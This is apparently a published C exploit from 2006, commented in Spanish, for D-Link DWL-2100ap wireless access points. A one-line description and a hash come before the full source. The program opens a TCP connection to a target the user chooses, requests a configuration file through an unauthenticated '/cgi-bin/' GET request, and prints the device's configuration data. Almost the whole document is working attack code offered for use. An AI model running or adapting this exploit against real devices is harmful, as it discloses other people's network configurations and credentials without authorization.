exploit for D-Link DWL-2100ap which discloses the configuration file to remote users.
9964f14447ea2955f5b7016a84c062307bcc7b43558f3ff7cb4b7aeea4f671f5
/*
Nombre: Revelación remota de información en D-Link DWL-2100ap
Fichero: D-Link.Wireless.Access-Point.c
Creado por: Lympex
Contacto:
Mail: lympex[at]gmail[dot]com
Web: Http://L-Bytes.Tk
Fecha: 08/06/2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
SOCKET sock;
void Uso(char *exe)
{
printf("\n[+] Uso: %s server.com <puerto> fichero.cfg",exe);
printf("\n[+] Ejemplo: %s mi_server.com 80 Intruders.cfg\n",exe);
return;
}
/*********************/
/* CONECTA A UN HOST */
/*********************/
BOOL Conecta(char *Host, short Puerto)
{
WSADATA wsaData;
struct sockaddr_in Winsock_In;
struct hostent *Ip;
int err;
/*iniciamos el socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*asociamos*/
sock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
/*miramos si está correcto, y así no rellenamos la estructura Winsock_In para nada*/
if(sock==INVALID_SOCKET)return FALSE;
/*rellenamos la estructura*/
Winsock_In.sin_port=htons(Puerto);
Winsock_In.sin_family=AF_INET;
/*pasamos el host -> ip*/
Ip=gethostbyname(Host);
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
/*conectamos*/
err=WSAConnect(sock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL);
if(err==SOCKET_ERROR)
return FALSE;
else
return TRUE;
}
int main(int argc, char *argv[])
{
BOOL conectado;
char Buff[1024];
int i;
printf("\n*********************************************************");
printf("\n* Revelacion remota de informacion en D-Link DWL-2100ap *");
printf("\n*=======================================================*");
printf("\n* Exploit coded by Lympex - lympex[at]gmail[dot]com *");
printf("\n* Http://L-Bytes.Tk *");
printf("\n*********************************************************\n");
if(argc!=4)
{
Uso(argv[0]);
return -1;
}
printf("\n[+] Conectando...");
conectado=Conecta(argv[1],(short)atoi(argv[2]));
if(conectado==FALSE)
{
printf("ERROR\n");
return -1;
}
printf("OK");
memset(Buff,0,sizeof(char*));
sprintf(Buff,"GET /cgi-bin/%s HTTP/1.0 \n\n\0",argv[3]);
i=0;
while(Buff[i]!='\0')i++;
send(sock,Buff,i,0);
printf("\n\n------------------ [ DATOS ] ------------------\n\n");
i=recv(sock,Buff,1024,0);
Buff[i]='\0';
printf("%s",Buff);
printf("\n\n------------------ [ /DATOS ] -----------------\n");
WSACleanup();
return 0;
}